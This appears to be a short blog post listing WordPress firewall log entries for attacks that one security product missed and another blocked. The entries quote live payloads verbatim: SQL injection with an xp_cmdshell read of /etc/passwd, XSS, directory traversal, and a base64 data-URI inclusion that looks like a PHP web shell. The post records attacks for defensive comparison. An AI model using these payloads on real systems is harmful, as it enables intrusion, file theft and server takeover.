Attacks That Imunify360 Didn’t Stop (Ninja Firewall Did)

Ι’m posting here a small sample of the first instance of each attack, from the logs. Most of those attacks happen several times in a day (or days) from different IPs.

While Imunify360 didn’t stop them and Ninja Firewall for WordPress did, most probably there is no risk, if your hosting server is correctly secured and your scripts updated (but you never know).

Still imho they should have been blocked by Imunify360 before reaching our website. And they were not.

09/Mar/20 23:51:26 #3691436 CRITICAL

GET /index.php – Directory traversal – [GET:MauQ = 2233 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(“XSS”)</script>’,table_name FROM information_schema.tables WHERE 2>1–/**/; EXEC xp_cmdshell(‘cat ../../../etc/passwd’)#]

 

12/Mar/20 08:24:12 #2039513 CRITICAL

GET /wp-admin/admin-post.php – WP vulnerability – [GET:page = wsal-setup]

10/Mar/20 23:46:24 #7108690 HIGH 1366 185.136.165.14

GET /wp-admin/install.php – Unauthorized file access – [SERVER:SCRIPT_NAME = /wp-admin/install.php]

 

14/Mar/20 14:23:34 #4341245 CRITICAL

GET /index.php – Directory traversal – [GET:skin = ../../../../../../../../windows/win.ini%00]

 

20/Mar/20 CRITICAL GET /index.php – Obfuscated data – [GET:foro_n = 2bd1b28c5f or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a) — and 1=1]

 

20/Mar/20 CRITICAL GET /index.php – Data URI scheme or PHP wrappers – [GET:file = data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUW2FkbWluXSk7Pz54YnNoZWxs]


Leave a Reply

Your email address will not be published. Required fields are marked *